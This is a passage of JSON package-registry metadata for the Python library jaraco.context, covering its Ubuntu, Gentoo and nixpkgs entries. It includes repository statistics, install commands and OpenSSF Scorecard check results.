ntu/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.04","url":"https://launchpad.net/ubuntu/noble","ecosystem":"ubuntu","default":true,"packages_count":37306,"maintainers_count":0,"namespaces_count":4,"keywords_count":1697,"github":"ubuntu","metadata":{"codename":"noble","funded_packages_count":1237},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:45.928Z","updated_at":"2026-08-24T05:06:09.353Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.04/namespaces"}},{"id":14512368,"name":"dev-python/jaraco-context","ecosystem":"gentoo","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["~alpha","amd64","arm","arm64","~hppa","~loong","~m68k","~mips","ppc","ppc64","~riscv","~s390","~sparc","x86","~arm64-macos","~x64-macos","~x64-solaris"],"namespace":"dev-python","versions_count":1,"first_release_published_at":"2026-05-11T16:39:47.000Z","latest_release_published_at":"2026-05-11T16:39:47.000Z","latest_release_number":"6.1.2","last_synced_at":"2026-08-22T00:31:32.716Z","created_at":"2026-05-27T02:26:14.390Z","updated_at":"2026-08-22T00:31:32.717Z","registry_url":"https://packages.gentoo.org/packages/dev-python/jaraco-context","install_command":"emerge dev-python/jaraco-context","documentation_url":"https://packages.gentoo.org/packages/dev-python/jaraco-context","metadata":{"category":"dev-python","slot":"0","eapi":"8","inherit":"distutils-r1 pypi","iuse":"test python_targets_pypy3_11 python_targets_python3_13t python_targets_python3_14t python_targets_python3_15t python_targets_python3_11 python_targets_python3_12 python_targets_python3_13 python_targets_python3_14 python_targets_python3_15"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.180Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:gentoo/dev-python/jaraco-context","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/gentoo/dev-python/jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/gentoo/dev-python/jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/gentoo/dev-python/jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fjaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fjaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fjaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fjaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fjaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/dev-python%2Fjaraco-context/codemeta","maintainers":[],"registry":{"name":"gentoo-portage","url":"https://packages.gentoo.org/","ecosystem":"gentoo","default":true,"packages_count":19524,"maintainers_count":0,"namespaces_count":174,"keywords_count":1054,"github":"gentoo","metadata":{"snapshot_url":"https://distfiles.gentoo.org/snapshots/portage-latest.tar.xz","funded_packages_count":620},"icon_url":"https://github.com/gentoo.png","created_at":"2026-05-26T08:59:24.155Z","updated_at":"2026-08-24T05:05:20.930Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/namespaces"}},{"id":13303851,"name":"python311Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T06:58:26.926Z","latest_release_published_at":"2026-02-02T06:58:26.926Z","latest_release_number":"4.3.0","last_synced_at":"2026-08-22T00:31:49.585Z","created_at":"2026-02-02T06:57:59.995Z","updated_at":"2026-08-22T00:59:16.828Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=python311Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python311Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/python-modules/jaraco-context/default.nix#L40","metadata":{"nix_attribute":"python3.11-jaraco-context-4.3.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:40","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.194Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":10.086154301244246,"forks_count":9.56664016713195,"docker_downloads_count":null,"average":4.913198617094049},"purl":"pkg:nix/python311Packages.jaraco-context?channel=23.11\u0026repository_url=https://channels.nixos.org/nixos-23.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python311Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python311Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue"